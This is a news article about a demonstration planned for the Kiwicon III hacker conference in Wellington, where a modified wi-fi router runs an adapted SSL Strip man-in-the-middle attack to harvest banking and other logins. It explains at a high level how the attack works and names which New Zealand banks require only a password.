A new and potentially dangerous wi-fi attack, one that negates both SSL and VeriSign certificate security, will be demonstrated at the Kiwicon III hackers’ conference at Victoria University in Wellington this weekend.
For many mobile professionals, getting free wi-fi is like that morning hit of caffeine. It’s hard to beat. But now even savvy users might have to think twice.
Hacker “Numero”, also known as Tim Clephane, is set to demonstrate the attack. It uses common wi-fi router technology with modified firmware to set up a “man in the middle” and harvest user names and passwords for social networking accounts, corporate logins and even online banking sessions.
The demonstration will show how easy it was for the router to circumvent the victim’s laptop from making a secure connection to a bank’s website. The router acts as a “man in the middle” making a secure connection with the bank, but passing the resulting webpage back to the victim over a non-encrypted connection. As such, the username and password never get encrypted and can be seen as plain text.
A quick survey of the major banks shows that Westpac, ASB, National Bank, ANZ, Bank Direct and HSBC only require a username and password to login. This means once your username and password has been exposed, a hacker could log in whenever they liked providing you had not changed your password.
The exceptions are BNZ with Net-Guard and KiwiBank with KeepSafe. Though Clephane says it would be still possible to steal the active session from the victim, allowing the hacker full control of the account.
What is more surprising is how well webpages work, even though they are not on a secure connection. Clephane says the demonstration will show, disturbingly, that clicking on the VeriSign verify button will produce a pass result, even though the connection is not secure.
For the astute user, the VeriSign padlock is not visible in the browser and nor does the URL say “HTTPS”, but these tiny elements are easy to overlook.
Clephane began his work earlier this year after discovering his own router had been hacked. He became curious as to why someone would hack a router, given the ubiquity of wi-fi, and what the hacker does once they have access to the network.
He had spare routers from a previous project. These used the Atheros chip and soft radios, making them powerful enough to be modified with new firmware that enables the attack. A tool called SSL Strip, developed by another hacker, “Moxie Marlinspike”, was modified to work on the router.
“The technique is the same, but adapted to work in the smaller device,” Clephane says.
The attack provides a “good user experience”, says Clephane, so users don’t receive any of the normal cues modern browsers would give alerting them to potentially dangerous threats.
“My attack does not trigger any certificates and browsing’s not disrupted or slowed down,” he says. He acknowledges having trapped himself on the hostile network once without realising it.
Most users access the internet with wi-fi using HTTP, Clephane says, so the router is a great vector to apply Marlinspike’s attack.
SSL Strip was demonstrated by Marlinspike at the US Black Hat conference in February.